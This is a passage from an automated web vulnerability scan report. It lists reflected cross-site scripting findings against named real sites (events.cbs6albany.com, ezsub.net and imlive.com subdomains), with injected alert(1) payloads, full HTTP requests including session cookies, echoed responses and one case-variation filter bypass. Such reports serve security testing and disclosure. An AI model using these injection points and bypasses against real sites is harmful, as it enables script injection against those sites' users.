<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/movies/show/299065-the-kings-speech?76ea0"><script>alert(1)</script>a87ae6cc1e7=1" /> ...[SNIP]...
4.427. http://events.cbs6albany.com/movies/show/324545-true-grit [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/movies/show/324545-true-grit
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bb0d"><script>alert(1)</script>1a0648de9b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies/show/324545-true-grit?1bb0d"><script>alert(1)</script>1a0648de9b6=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/movies/show/324545-true-grit?1bb0d"><script>alert(1)</script>1a0648de9b6=1" /> ...[SNIP]...
4.428. http://events.cbs6albany.com/movies/show/344645-no-strings-attached [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/movies/show/344645-no-strings-attached
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59d9f"><script>alert(1)</script>8f21b9a1a18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies/show/344645-no-strings-attached?59d9f"><script>alert(1)</script>8f21b9a1a18=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/movies/show/344645-no-strings-attached?59d9f"><script>alert(1)</script>8f21b9a1a18=1" /> ...[SNIP]...
4.429. http://events.cbs6albany.com/movies/show/346845-sanctum-3d [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/movies/show/346845-sanctum-3d
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4654f"><script>alert(1)</script>bbe709d4b33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies/show/346845-sanctum-3d?4654f"><script>alert(1)</script>bbe709d4b33=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/movies/show/346845-sanctum-3d?4654f"><script>alert(1)</script>bbe709d4b33=1" /> ...[SNIP]...
4.430. http://events.cbs6albany.com/movies/show/354805-sanctum [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/movies/show/354805-sanctum
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d0d"><script>alert(1)</script>b30c7e194be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies/show/354805-sanctum?a9d0d"><script>alert(1)</script>b30c7e194be=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 3ede7<script>alert(1)</script>1995b73f8f was submitted in the st parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?st=event3ede7<script>alert(1)</script>1995b73f8f&swhen=Today HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
The value of the st request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e880e"%3balert(1)//4f5e099d790 was submitted in the st parameter. This input was echoed as e880e";alert(1)//4f5e099d790 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?st=evente880e"%3balert(1)//4f5e099d790&swhen=Today HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
The value of the st request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3295'%3balert(1)//c7b12d2e1bf was submitted in the st parameter. This input was echoed as f3295';alert(1)//c7b12d2e1bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?st=eventf3295'%3balert(1)//c7b12d2e1bf&swhen=Today HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc86f"><script>alert(1)</script>076e941308e was submitted in the st parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?st=eventcc86f"><script>alert(1)</script>076e941308e&swhen=Today HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
The value of the swhen request parameter is copied into the HTML document as plain text between tags. The payload bdbbd<script>alert(1)</script>c8e9589b31a was submitted in the swhen parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?st=event&swhen=Todaybdbbd<script>alert(1)</script>c8e9589b31a HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <div id="error_message"> Unrecognized date format: Todaybdbbd<script>alert(1)</script>c8e9589b31a is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'> ...[SNIP]...
The value of the PGTP request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fce60"><script>alert(1)</script>2ae1c00828f was submitted in the PGTP parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=Afce60"><script>alert(1)</script>2ae1c00828f HTTP/1.1 Host: ezsub.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
The value of the PUBID request parameter is copied into the HTML document as plain text between tags. The payload 1d459<script>alert(1)</script>fb57b35142c was submitted in the PUBID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5861d459<script>alert(1)</script>fb57b35142c&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A HTTP/1.1 Host: ezsub.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252"> <META NAME="Generator" CONTENT=""> <TITLE>Web Ca ...[SNIP]... <BR> ERROR: Web Page is corrupted! Wrong PUBID=5861D459<SCRIPT>ALERT(1)</SCRIPT>FB57B35142C.<BR> ...[SNIP]...
The value of the SBTYPE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3cf9"><script>alert(1)</script>2780b4f0119 was submitted in the SBTYPE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XXa3cf9"><script>alert(1)</script>2780b4f0119&PGTP=A HTTP/1.1 Host: ezsub.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
The value of the SOURCE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87eb7"><script>alert(1)</script>1275777e30 was submitted in the SOURCE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET87eb7"><script>alert(1)</script>1275777e30&RDRID=&SBTYPE=XX&PGTP=A HTTP/1.1 Host: ezsub.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
The value of the jt request parameter is copied into the HTML document as plain text between tags. The payload 4972f<script>alert(1)</script>d2f01f95955 was submitted in the jt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc4972f<script>alert(1)</script>d2f01f95955&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A HTTP/1.1 Host: ezsub.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
4.441. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a9d8"><ScRiPt>alert(1)</ScRiPt>bf56a35d647 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /?2a9d8"><ScRiPt>alert(1)</ScRiPt>bf56a35d647=1 HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||2a9d8"><script>alert(1)</script>bf56a35d647~1');return false;"> ...[SNIP]...
4.442. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b566'-alert(1)-'c7449b1e1ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?4b566'-alert(1)-'c7449b1e1ba=1 HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17fa1'onerror%3d'alert(1)'4373c72317b was submitted in the gotopage parameter. This input was echoed as 17fa1'onerror='alert(1)'4373c72317b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/17fa1'onerror%3d'alert(1)'4373c72317b HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:22 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ifr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQQRCSC=BMMFJIMAJCKNADIOHDLHHPAA; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:22 GMT Connection: close Content-Length: 8315 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
4.444. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b12e'-alert(1)-'11d097f86af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
